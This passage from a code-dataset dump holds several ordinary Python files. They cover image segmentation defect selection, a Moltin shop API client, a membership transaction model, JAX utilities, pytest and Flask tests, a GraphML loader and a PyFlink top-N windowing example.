:img_list[1].shape[1], :] = img_list[0]\n canvas_img[img_list[1].shape[0]:, img_list[1].shape[1]:, :] = img_list[1]\n canvas_img[:img_list[1].shape[0], img_list[1].shape[1]:, :] = cv2.applyColorMap(255 - img_list[2],\n cv2.COLORMAP_JET)\n return canvas_img\n\n def add_prob_mask(self, image_files):\n print('image origin files has ', len(image_files))\n self.name_order['prob'] = []\n for image_file in image_files:\n name = self.get_name(image_file)\n pairs = self._get_image_pair_map_extend(name)\n pairs[\"prob_mask_file\"] = image_file\n self.name_order['prob'].append(name)\n\n def _read_img(self, file_name):\n value = self.group_file_map[file_name]\n src_path = value[\"image_file\"]\n pred_path = value[\"pred_mask_file\"]\n prob_path = value[\"prob_mask_file\"]\n src_img = cv2.imread(src_path, -1)\n pred_img = cv2.imread(pred_path, -1)\n prob_img = cv2.imread(prob_path, -1)\n # print(src_path, pred_img, prob_path)\n img_list = [src_img, pred_img, prob_img]\n return img_list\n\n def _get_pair_names_list(self):\n # src_img = cv2.imread(src_path, -1)\n # pred_img = cv2.imread(pred_path, -1)\n # prob_img = cv2.imread(prob_path, -1)\n pass\n\n def _preprocess(self, prob_img):\n norm_img_shape = (1280, 720)\n min_defect_norm_area = 500\n down_mask_out_ration = 0.08\n img_shape = prob_img.shape[:2]\n min_defect_area = min_defect_norm_area / (norm_img_shape[0] * norm_img_shape[1]) * (img_shape[0] * img_shape[1])\n down_mask_out_area = np.array([[0, int((1 - down_mask_out_ration) * img_shape[0])],\n [img_shape[1], int((1 - down_mask_out_ration) * img_shape[0])],\n [img_shape[1], img_shape[0]],\n [0, img_shape[0]]])\n return down_mask_out_area, min_defect_area\n\n def _find_defect_contours(self, prob_img, min_defect_area, check_ratio=0.7):\n prob_img_show = prob_img.copy()\n img_shape = prob_img.shape[:2]\n norm_img_shape = (1280, 720)\n mask = np.array(prob_img_show < int(check_ratio * 255), np.uint8)\n kernel = np.ones((5, 5), np.uint8)\n binary = cv2.erode(mask, kernel, iterations=1)\n contours, hierarchy = cv2.findContours(binary, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n valid_contours = []\n low_conf_area = 0\n for contour in contours:\n area = cv2.contourArea(contour)\n # 过滤掉小面积\n if area < min_defect_area:\n continue\n # 过滤掉上部分区域\n is_in_contour = cv2.pointPolygonTest(contour, (10, 10), False)\n if (is_in_contour == 1):\n continue\n valid_contours.append(contour)\n low_conf_area += area\n low_conf_norm_area = low_conf_area / (img_shape[0] * img_shape[1]) * (norm_img_shape[0] * norm_img_shape[1])\n return valid_contours, low_conf_norm_area\n\n def _calculate_histgrom(self, cv_img, ratio):\n hist, _ = np.histogram(cv_img, bins=256) # 用numpy包计算直方图\n hist_ratio = np.sum(hist[0:int(ratio * 255)]) / np.sum(hist)\n return hist, hist_ratio\n\n def _get_low_confidence_area(self, file_name, check_ratio=0.7):\n img_list = self._read_img(file_name)\n prob_img = img_list[2]\n down_mask_out_area, min_defect_area = self._preprocess(prob_img)\n prob_img[prob_img == 0] = 255\n valid_contours, low_conf_norm_area = self._find_defect_contours(prob_img, min_defect_area,\n check_ratio=0.7)\n _, hist_ratio = self._calculate_histgrom(prob_img, check_ratio)\n return valid_contours, low_conf_norm_area, hist_ratio\n\n\nif __name__ == '__main__':\n from file.file_list import file_list_main\n from perception.config.seg_select_unlabel_defects_config import untouch_road as SelectConfig\n\n # 原图\n src_img_dir = SelectConfig.get(\"src_img_dir\")\n # 预测彩图\n pred_dir = SelectConfig.get(\"pred_dir\")\n # 预测置信度图\n prob_dir = SelectConfig.get(\"prob_dir\")\n # 保存地址\n save_dir = SelectConfig.get(\"save_dir\")\n\n image_origin_files_all = file_list_main.find_files(src_img_dir, ['png', 'jpg'], recursive=True)\n image_pred_files_all = file_list_main.find_files(pred_dir, ['png', 'jpg'], recursive=True)\n image_prob_files_all = file_list_main.find_files(prob_dir, ['png', 'jpg'], recursive=True)\n\n seg_pic_data = SegUnlabelDefect()\n seg_pic_data.add_image_origin(image_origin_files_all)\n seg_pic_data.add_pred_mask(image_pred_files_all)\n seg_pic_data.add_prob_mask(image_prob_files_all)\n\n seg_pic_data.export_defect_list(save_dir, \"test_demo1\", 0.7)\n\n seg_pic_data.show_defect()\n", "repo_name": "zodiac000/ttt", "sub_path": "perception/seg_script/seg_select_defects_unlabel_batch.py", "file_name": "seg_select_defects_unlabel_batch.py", "file_ext": "py", "file_size_in_byte": 7631, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "perception.base.seg_group_files.SegGroupFiles", "line_number": 9, "usage_type": "name"}, {"api_name": "view.base.img_view.ImgView", "line_number": 12, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 33, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "cv2.drawContours", "line_number": 56, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 57, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 60, "usage_type": "attribute"}, {"api_name": "cv2.applyColorMap", "line_number": 63, "usage_type": "call"}, {"api_name": "cv2.COLORMAP_JET", "line_number": 64, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 81, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 82, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 110, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 111, "usage_type": "attribute"}, {"api_name": "cv2.erode", "line_number": 112, "usage_type": "call"}, {"api_name": "cv2.findContours", "line_number": 113, "usage_type": "call"}, {"api_name": "cv2.RETR_EXTERNAL", "line_number": 113, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_SIMPLE", "line_number": 113, "usage_type": "attribute"}, {"api_name": "cv2.contourArea", "line_number": 117, "usage_type": "call"}, {"api_name": "cv2.pointPolygonTest", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.histogram", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 132, "usage_type": "call"}, {"api_name": "perception.config.seg_select_unlabel_defects_config.untouch_road.get", "line_number": 151, "usage_type": "call"}, {"api_name": "perception.config.seg_select_unlabel_defects_config.untouch_road", "line_number": 151, "usage_type": "name"}, {"api_name": "perception.config.seg_select_unlabel_defects_config.untouch_road.get", "line_number": 153, "usage_type": "call"}, {"api_name": "perception.config.seg_select_unlabel_defects_config.untouch_road", "line_number": 153, "usage_type": "name"}, {"api_name": "perception.config.seg_select_unlabel_defects_config.untouch_road.get", "line_number": 155, "usage_type": "call"}, {"api_name": "perception.config.seg_select_unlabel_defects_config.untouch_road", "line_number": 155, "usage_type": "name"}, {"api_name": "perception.config.seg_select_unlabel_defects_config.untouch_road.get", "line_number": 157, "usage_type": "call"}, {"api_name": "perception.config.seg_select_unlabel_defects_config.untouch_road", "line_number": 157, "usage_type": "name"}, {"api_name": "file.file_list.file_list_main.find_files", "line_number": 159, "usage_type": "call"}, {"api_name": "file.file_list.file_list_main", "line_number": 159, "usage_type": "name"}, {"api_name": "file.file_list.file_list_main.find_files", "line_number": 160, "usage_type": "call"}, {"api_name": "file.file_list.file_list_main", "line_number": 160, "usage_type": "name"}, {"api_name": "file.file_list.file_list_main.find_files", "line_number": 161, "usage_type": "call"}, {"api_name": "file.file_list.file_list_main", "line_number": 161, "usage_type": "name"}]}
+{"seq_id": "19513335908", "text": "import time\n\nimport requests\n\nEP_ACCESS_TOKEN = None\nEP_TOKEN_LIFETIME = None\n\n\ndef get_ep_access_token(moltin_token):\n now_time = time.time()\n global EP_ACCESS_TOKEN\n global EP_TOKEN_LIFETIME\n\n if not EP_TOKEN_LIFETIME or EP_TOKEN_LIFETIME < now_time:\n EP_ACCESS_TOKEN, EP_TOKEN_LIFETIME = create_ep_access_token(moltin_token)\n\n return EP_ACCESS_TOKEN\n\n\ndef create_ep_access_token(moltin_token):\n url = 'https://api.moltin.com/oauth/access_token'\n data = {\n 'client_id': moltin_token,\n 'grant_type': 'implicit'\n }\n response = requests.post(url, data=data)\n response.raise_for_status()\n response_details = response.json()\n ep_token_lifetime = response_details['expires']\n ep_access_token = response_details['access_token']\n return ep_access_token, ep_token_lifetime\n\n\ndef get_all_products(moltin_token):\n access_token = get_ep_access_token(moltin_token)\n headers = {\n 'Authorization': f'Bearer {access_token}',\n }\n response = requests.get('https://api.moltin.com/v2/products',\n headers=headers)\n response.raise_for_status()\n return response.json()\n\n\ndef get_product(moltin_token, product_id):\n access_token = get_ep_access_token(moltin_token)\n headers = {\n 'Authorization': f'Bearer {access_token}',\n }\n response = requests.get(f'https://api.moltin.com/v2/products/{product_id}',\n headers=headers)\n response.raise_for_status()\n return response.json()\n\n\ndef get_image(moltin_token, image_id):\n access_token = get_ep_access_token(moltin_token)\n headers = {\n 'Authorization': f'Bearer {access_token}',\n }\n response = requests.get(f'https://api.moltin.com/v2/files/{image_id}',\n headers=headers)\n response.raise_for_status()\n image = response.json()['data']['link']['href']\n return image\n\n\ndef add_product_to_cart(moltin_token, cart_id, product_id, quantity):\n url = f'https://api.moltin.com/v2/carts/{cart_id}/items'\n access_token = get_ep_access_token(moltin_token)\n headers = {\n 'Authorization': f'Bearer {access_token}',\n 'Content-Type': 'application/json',\n }\n data = {\"data\":\n { \"id\": product_id,\n \"type\": \"cart_item\",\n \"quantity\": quantity}\n }\n response = requests.post(url, headers=headers, json=data)\n response.raise_for_status()\n return response.json()\n\n\ndef get_cart(moltin_token, cart_id):\n access_token = get_ep_access_token(moltin_token)\n headers = {\n 'Authorization': f'Bearer {access_token}',\n }\n response = requests.get(f'https://api.moltin.com/v2/carts/{cart_id}',\n headers=headers)\n response.raise_for_status()\n return response.json()\n\n\ndef get_cart_items(moltin_token, cart_id):\n url = f'https://api.moltin.com/v2/carts/{cart_id}/items'\n access_token = get_ep_access_token(moltin_token)\n headers = {\n 'Authorization': f'Bearer {access_token}',\n }\n response = requests.get(url, headers=headers)\n response.raise_for_status()\n return response.json()\n\n\ndef remove_item_in_cart(moltin_token, cart_id, cart_item_id):\n url = f'https://api.moltin.com/v2/carts/{cart_id}/items/{cart_item_id}'\n access_token = get_ep_access_token(moltin_token)\n headers = {\n 'Authorization': f'Bearer {access_token}',\n }\n response = requests.delete(url, headers=headers)\n response.raise_for_status()\n return response.json()\n\n\ndef create_customer(moltin_token, name, email):\n url = f'https://api.moltin.com/v2/customers'\n access_token = get_ep_access_token(moltin_token)\n headers = {\n 'Authorization': f'Bearer {access_token}',\n 'Content-Type': 'application/json',\n }\n data = {\"data\":\n {\"type\": \"customer\",\n \"name\": name,\n \"email\": email}\n }\n response = requests.post(url, headers=headers, json=data)\n response.raise_for_status()\n return response.json()\n\n\ndef get_customer(moltin_token, user_id):\n url = f'https://api.moltin.com/v2/customers/{user_id}'\n access_token = get_ep_access_token(moltin_token)\n headers = {\n 'Authorization': f'Bearer {access_token}',\n }\n response = requests.get(url, headers=headers)\n response.raise_for_status()\n return response.json()\n", "repo_name": "v1ztep/fish_sale_TG_bot", "sub_path": "moltin.py", "file_name": "moltin.py", "file_ext": "py", "file_size_in_byte": 4407, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "time.time", "line_number": 10, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 26, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 39, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 50, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 61, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 80, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 90, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 102, "usage_type": "call"}, {"api_name": "requests.delete", "line_number": 113, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 130, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 141, "usage_type": "call"}]}
+{"seq_id": "74235318489", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\" Simple transcation database access\n\n Connects to the database or emulate a connection\n\n pre-requisite:\n sudo pip3 install PyMySQL\n\n\n sudo systemctl restart httpd\n http://127.0.0.1/phpMyAdmin/\n\n Transactions table:\n --\n-- Table structure for table `transactions`\n--\n\nCREATE TABLE `transactions` (\n `id` int(11) NOT NULL,\n `member_id` int(11) NOT NULL,\n `type` varchar(20) NOT NULL,\n `description` text NOT NULL,\n `amount` float NOT NULL,\n `currency` varchar(4) NOT NULL,\n `valid_from` date NOT NULL,\n `valid_until` date NOT NULL,\n `created_on` datetime NOT NULL\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n--\n-- Indexes for table `transactions`\n--\nALTER TABLE `transactions`\n ADD PRIMARY KEY (`id`);\n\n--\n-- AUTO_INCREMENT for dumped tables\n--\n\n--\n-- AUTO_INCREMENT for table `transactions`\n--\nALTER TABLE `transactions`\n MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;\nCOMMIT;\n\n\"\"\"\n__author__ = \"Eric Gibert\"\n__version__ = \"1.0.20170113\"\n__email__ = \"ericgibert@yahoo.fr\"\n__license__ = \"MIT\"\nfrom datetime import datetime, timedelta, date\nfrom collections import OrderedDict\nfrom model_db import Database\nfrom member import Member\n\nclass Transaction(Database):\n \"\"\"\n A transaction record in the database - SELECT mode only supported\n \"\"\"\n def __init__(self, transac_id=None, member_id=None, *args, **kwargs):\n \"\"\"\n Select a record from the database based on a transactions table id\n :param transac_id: int for transaction table key\n \"\"\"\n super().__init__(table=\"transactions\", *args, **kwargs)\n self.MEMBERSHIP = Member.MEMBERSHIP\n if transac_id:\n self.get_from_db(transac_id)\n elif member_id:\n member = Member(id=member_id)\n default_membership = self.MEMBERSHIP[0]\n valid_from = max(date.today(), member['validity'])\n self.data = OrderedDict([ # ('id', None),\n ('member_id', member_id),\n ('type', default_membership[0]),\n ('description', \"\"),\n ('amount', default_membership[2]),\n ('currency', 'CNY'),\n ('valid_from', valid_from),\n ('valid_until', valid_from+timedelta(days=default_membership[3])),\n ('created_on', datetime.now()) ])\n else:\n self.data = OrderedDict()\n\n def get_from_db(self, transac_id):\n \"\"\"Connects to the database to fetch a transaction table record or simulation\"\"\"\n self.data = self.select(id=transac_id)\n self.id = transac_id\n\n def update_member_status(self, member_id):\n \"\"\"Update the status of a member to OK or NOT_OK accordingly to the mambership payment\"\"\"\n result = self.fetch(\"select max(valid_until) as max_valid from transactions where member_id=%s and right(type,10)='MEMBERSHIP'\", params=(member_id,))\n try:\n new_status = 'OK' if result['max_valid']>=date.today() else 'NOT_OK'\n except TypeError:\n new_status = 'NOT_OK'\n member = Member(member_id=member_id)\n member.update(id=member_id, status=new_status)\n\n", "repo_name": "ericgibert/zhima", "sub_path": "zhima/transaction.py", "file_name": "transaction.py", "file_ext": "py", "file_size_in_byte": 3174, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "model_db.Database", "line_number": 58, "usage_type": "name"}, {"api_name": "member.Member.MEMBERSHIP", "line_number": 68, "usage_type": "attribute"}, {"api_name": "member.Member", "line_number": 68, "usage_type": "name"}, {"api_name": "member.Member", "line_number": 72, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 74, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 74, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 75, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 82, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 83, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 83, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 85, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 96, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 96, "usage_type": "name"}, {"api_name": "member.Member", "line_number": 99, "usage_type": "call"}, {"api_name": "member.update", "line_number": 100, "usage_type": "call"}]}
+{"seq_id": "11021175548", "text": "import jax.numpy as jnp\nimport jraph\nimport optax\nfrom typing import Dict, Any\nimport pennylane as qml\n\ndef replace_globals(graphs: jraph.GraphsTuple) -> jraph.GraphsTuple:\n\t\"\"\"Replaces the globals attribute with a constant feature for each graph.\"\"\"\n\treturn graphs._replace(\n\t\t\tglobals=jnp.ones([graphs.n_node.shape[0], 1]))\n\ndef create_optimizer(\n\t\tconfig) -> optax.GradientTransformation:\n\t\"\"\"Creates an optimizer, as specified by the config.\"\"\"\n\tif config.optimizer == 'adam':\n\t\treturn optax.adam(\n\t\t\t\tlearning_rate=config.learning_rate)\n\tif config.optimizer == 'sgd':\n\t\treturn optax.sgd(\n\t\t\t\tlearning_rate=config.learning_rate,\n\t\t\t\tmomentum=config.momentum)\n\traise ValueError(f'Unsupported optimizer: {config.optimizer}.')\n\ndef add_prefix_to_keys(result: Dict[str, Any], prefix: str) -> Dict[str, Any]:\n \"\"\"Adds a prefix to the keys of a dict, returning a new dict.\"\"\"\n return {f'{prefix}_{key}': val for key, val in result.items()}\n\ndef circuit(x, params, n):\n\tw, b = params\n\tz = jnp.dot(x, w) + b\n\tfor i in range(n):\n\t\tqml.RX(z[i], wires=i)\n", "repo_name": "Gopal-Dahale/QMLHEP-Tasks-2023", "sub_path": "Task_V/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 1050, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "jraph.GraphsTuple", "line_number": 7, "usage_type": "attribute"}, {"api_name": "jax.numpy.ones", "line_number": 10, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 10, "usage_type": "name"}, {"api_name": "optax.adam", "line_number": 16, "usage_type": "call"}, {"api_name": "optax.sgd", "line_number": 19, "usage_type": "call"}, {"api_name": "optax.GradientTransformation", "line_number": 13, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 24, "usage_type": "name"}, {"api_name": "jax.numpy.dot", "line_number": 30, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 30, "usage_type": "name"}, {"api_name": "pennylane.RX", "line_number": 32, "usage_type": "call"}]}
+{"seq_id": "23676907320", "text": "import pytest\nfrom hal_hw_interface.hal_io_comp import HalIO\nfrom pprint import pformat\nimport yaml\nimport os\n\n\nclass TestHalIO:\n test_class = HalIO\n rclpy_patches = [\n \"hal_hw_interface.hal_obj_base.rclpy\",\n \"hal_hw_interface.ros_hal_component.rclpy\",\n ]\n\n def flatten_keys(self, prefix, data, result=dict()):\n for key, val in data.items():\n new_prefix = \"/\".join([prefix, key])\n if not isinstance(val, dict):\n result[new_prefix] = val\n else:\n self.flatten_keys(new_prefix, val, result)\n return result\n\n @pytest.fixture\n def config(self):\n self.config_file = os.path.join(\n os.path.dirname(__file__), \"hal_io.conf.yaml\"\n )\n with open(self.config_file, \"r\") as f:\n self.config = yaml.safe_load(f)\n print(\"hal_io config:\", pformat(self.config))\n yield self.config\n\n @pytest.fixture\n def obj(self, mock_hal_comp, mock_rclpy, config):\n self.test_class._cached_objs.clear()\n obj = self.test_class([self.config_file])\n obj.setup_component()\n yield obj\n\n def test_hal_io_comp_setup_component(self, obj, config):\n # Put pins in dict\n obj_pins = dict()\n for pin in obj.pins:\n obj_pins[pin.name] = pin\n\n for config_key, pins in config.items():\n print(\"\\n\\nPin class: %s\" % config_key)\n for pin_name, pin_data in pins.items():\n print(\"pin_name:\", pin_name, \"pin_data:\", pin_data)\n # Check pin was created\n assert pin_name in obj_pins\n # Check pin attributes\n pin = obj_pins[pin_name]\n print(\" name %s; data %s\" % (pin_name, pin_data))\n print(\" pin %s\" % pin)\n for key, val in pin_data.items():\n assert str(getattr(pin, key)) == val\n\n def test_hal_io_comp_update(self, obj, mock_hal_comp):\n # Check that pins' update() method was called\n for pin in obj.pins: # Init pin values\n self.pvals[pin.name] = 1\n\n # Run update() and check that pins changed\n obj.update()\n print(\"publishers\", pformat(self.publishers))\n print(\"pin values\", pformat(self.pvals))\n for pin in obj.pins:\n print(f\"- pin {pin}\")\n publisher = self.publishers[pin.pub_topic]\n publisher.publish.assert_called()\n", "repo_name": "tormach/hal_ros_control", "sub_path": "hal_hw_interface/hal_hw_interface/tests/test_hal_io_comp.py", "file_name": "test_hal_io_comp.py", "file_ext": "py", "file_size_in_byte": 2467, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 45, "dataset": "github-code", "pt": "31", "api": [{"api_name": "hal_hw_interface.hal_io_comp.HalIO", "line_number": 9, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "yaml.safe_load", "line_number": 30, "usage_type": "call"}, {"api_name": "pprint.pformat", "line_number": 31, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pprint.pformat", "line_number": 67, "usage_type": "call"}, {"api_name": "pprint.pformat", "line_number": 68, "usage_type": "call"}]}
+{"seq_id": "16286376937", "text": "import os\nimport json\nimport tempfile\nimport unittest\nfrom datetime import datetime\n\nimport miniurl\n\n\nclass MiniUrlBaseCase(unittest.TestCase):\n\n def setUp(self):\n self.db_fd, self.path = tempfile.mkstemp()\n miniurl.app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + self.path\n miniurl.app.config['TESTING'] = True\n self.db = miniurl.db\n self.db.create_all()\n self.app = miniurl.app.test_client()\n\n def tearDown(self):\n self.db.session.remove()\n self.db.drop_all()\n os.close(self.db_fd)\n os.unlink(self.path)\n\n\nclass MiniUrlRoutesTestCase(MiniUrlBaseCase):\n\n def test_can_get_homepage(self):\n res = self.app.get('/')\n self.assertEqual(200, res.status_code)\n self.assertIn('Mini URL', res.data)\n\n def test_can_post_homepage(self):\n res = self.app.post(\n '/',\n data=dict(url='http://foobar.com'),\n follow_redirects=True\n )\n self.assertEqual(200, res.status_code)\n self.assertIn('Mini URL', res.data)\n\n def test_can_get_statspage(self):\n res = self.app.get('/stats')\n self.assertEqual(200, res.status_code)\n\n\nclass MiniUrlStatTestCase(MiniUrlBaseCase):\n\n def setUp(self):\n MiniUrlBaseCase.setUp(self)\n stats = miniurl.Stats(\n 'foo platform',\n 'foo browser',\n 'foo version',\n 'foo language',\n 'foo ua string',\n 'foo ip'\n )\n self.db.session.add(stats)\n self.db.session.commit()\n\n def get_endpoint(self, endpoint):\n res = self.app.get('/data/' + endpoint)\n data = json.loads(res.data)\n return res, data\n\n def test_can_get_data_browsers_endpoint(self):\n res, data = self.get_endpoint('browsers')\n self.assertEqual('application/json', res.mimetype)\n self.assertIn('foo browser', data.keys())\n\n def test_can_get_data_platforms_endpoint(self):\n res, data = self.get_endpoint('platforms')\n self.assertEqual('application/json', res.mimetype)\n self.assertIn('foo platform', data.keys())\n\n def test_can_get_data_months_endpoint(self):\n res, data = self.get_endpoint('months')\n month_today = datetime.today().strftime('%b')\n self.assertEqual('application/json', res.mimetype)\n self.assertIn(month_today, data.keys())\n", "repo_name": "rsiemens/mini-url", "sub_path": "app/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 2394, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "unittest.TestCase", "line_number": 10, "usage_type": "attribute"}, {"api_name": "tempfile.mkstemp", "line_number": 13, "usage_type": "call"}, {"api_name": "miniurl.app", "line_number": 14, "usage_type": "attribute"}, {"api_name": "miniurl.app", "line_number": 15, "usage_type": "attribute"}, {"api_name": "miniurl.db", "line_number": 16, "usage_type": "attribute"}, {"api_name": "miniurl.app.test_client", "line_number": 18, "usage_type": "call"}, {"api_name": "miniurl.app", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.close", "line_number": 23, "usage_type": "call"}, {"api_name": "os.unlink", "line_number": 24, "usage_type": "call"}, {"api_name": "miniurl.Stats", "line_number": 52, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 65, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 80, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 80, "usage_type": "name"}]}
+{"seq_id": "42026096548", "text": "from pygraphml import GraphMLParser\nimport networkx as nx\nimport formats\n\n# Node attributes not to be imported for analysis purposes\nattr_blacklist=['x','y']\n\n# Load GraphML file and return a NetworkX graph object\n#\n# The NetworkX GraphML parser is too picky, so we use the one\n# from pygraphml and translate the graph\ndef _graphml2nx(fname):\n\tg=nx.DiGraph()\n\tdef _attrdict(node):\n\t\tattrs=node.attributes()\n\t\treturn {key:attrs[key].value for key in attrs if key not in attr_blacklist}\n\tparser=GraphMLParser()\n\timported_graph=parser.parse(fname)\n\tedges=[(edge.node1.id, edge.node2.id) for edge in imported_graph.edges()]\n\tnodes=[(node.id, _attrdict(node)) for node in imported_graph.nodes()]\n\tg.add_edges_from(edges)\n\tg.add_nodes_from(nodes)\n\tassert(nx.is_tree(g))\n\tassert(nx.is_directed(g))\n\treturn g\n\n# Check the file for its format and return the correct deplytics object\ndef loader(fname):\n\twith open(fname,\"r\") as f:\n\t\tdata=f.read()\n\t\tfor tree_class in formats._all:\n\t\t\tif tree_class.DATA_IDENTIFIER in data:\n\t\t\t\treturn tree_class(_graphml2nx(fname))\n", "repo_name": "troeger/deplytics", "sub_path": "formats/importer.py", "file_name": "importer.py", "file_ext": "py", "file_size_in_byte": 1055, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "networkx.DiGraph", "line_number": 13, "usage_type": "call"}, {"api_name": "pygraphml.GraphMLParser", "line_number": 17, "usage_type": "call"}, {"api_name": "networkx.is_tree", "line_number": 23, "usage_type": "call"}, {"api_name": "networkx.is_directed", "line_number": 24, "usage_type": "call"}, {"api_name": "formats._all", "line_number": 31, "usage_type": "attribute"}]}
+{"seq_id": "29207219137", "text": "#!/usr/bin/python\n# -*- coding:UTF-8 -*-\nfrom typing import Iterable\n\nfrom pyflink.common import SimpleStringSchema, Duration, WatermarkStrategy, Time\nfrom pyflink.common.watermark_strategy import TimestampAssigner\nfrom pyflink.datastream import StreamExecutionEnvironment, AggregateFunction, ProcessWindowFunction, \\\n KeyedProcessFunction\nfrom pyflink.datastream.connectors.kafka import KafkaSource, KafkaOffsetsInitializer\nfrom pyflink.datastream.window import SlidingEventTimeWindows, TimeWindow\n\nfrom functions.func import WSMapFunction\nfrom model.water_sensor import WaterSensor\n\n\nclass KeyedProcessFunctionTopN(TimestampAssigner):\n def extract_timestamp(self, value: WaterSensor, record_timestamp: int) -> int:\n yield value.ts * 1000\n\n\nclass VcCountAgg(AggregateFunction):\n def create_accumulator(self):\n return 0\n\n def add(self, value, accumulator):\n return accumulator + 1\n\n def get_result(self, accumulator):\n return accumulator\n\n def merge(self, acc_a, acc_b):\n return None\n\n\nclass WindowResult(ProcessWindowFunction[int, tuple, str, TimeWindow]):\n \"\"\"\n 第一个:输入类型 = 增量函数的输出 count值,Integer\n 第二个:输出类型 = Tuple3(vc,count,windowEnd) ,带上 窗口结束时间 的标签\n 第三个:key类型 , vc,Integer\n 第四个:窗口类型\n \"\"\"\n\n def process(self,\n key: int,\n context: 'ProcessWindowFunction.Context',\n elements: Iterable[int]) -> Iterable[tuple]:\n # 迭代器里面只有一条数据,next一次即可\n count = len([e for e in elements])\n window_end = context.window().end\n yield key, count, window_end\n\n\nclass TopN(KeyedProcessFunction):\n def __init__(self, threshold):\n # 要取的Top数量\n self.threshold = threshold\n # 存不同窗口的 统计结果,key=windowEnd,value=list数据\n self.data_list_map = {}\n\n def process_element(self, value, ctx: 'KeyedProcessFunction.Context'):\n # 进入这个方法,只是一条数据,要排序,得到齐才行 ===》 存起来,不同窗口分开存\n window_end = value[1]\n if window_end in self.data_list_map.keys():\n # 1.1 包含vc,不是该vc的第一条,直接添加到List中\n data_list = []\n key = self.data_list_map.get(window_end)\n data_list.append(value)\n # self.data_list_map[key] = data_list\n else:\n # 不包含vc,是该vc的第一条,需要初始化list\n data_list = [value]\n self.data_list_map[window_end] = data_list\n\n # 2. 注册一个定时器, windowEnd+1ms即可\n # 同一个窗口范围,应该同时输出,只不过是一条一条调用processElement方法,只需要延迟1ms即可\n ctx.timer_service().register_event_time_timer(window_end + 1)\n\n def on_timer(self, timestamp: int, ctx: 'KeyedProcessFunction.OnTimerContext'):\n # 定时器触发,同一个窗口范围的计算结果攒齐了,开始 排序、取TopN\n window_end = ctx.get_current_key()\n data_list = self.data_list_map.get(window_end)\n\n yield data_list\n\n\ndef keyed_process_function_topN_demo():\n env = StreamExecutionEnvironment.get_execution_environment()\n\n env.set_parallelism(1)\n\n brokers = \"localhost:9092\"\n source = KafkaSource.builder() \\\n .set_bootstrap_servers(brokers) \\\n .set_topics(\"pyflink_kafka\") \\\n .set_group_id(\"my-group\") \\\n .set_starting_offsets(KafkaOffsetsInitializer.latest()) 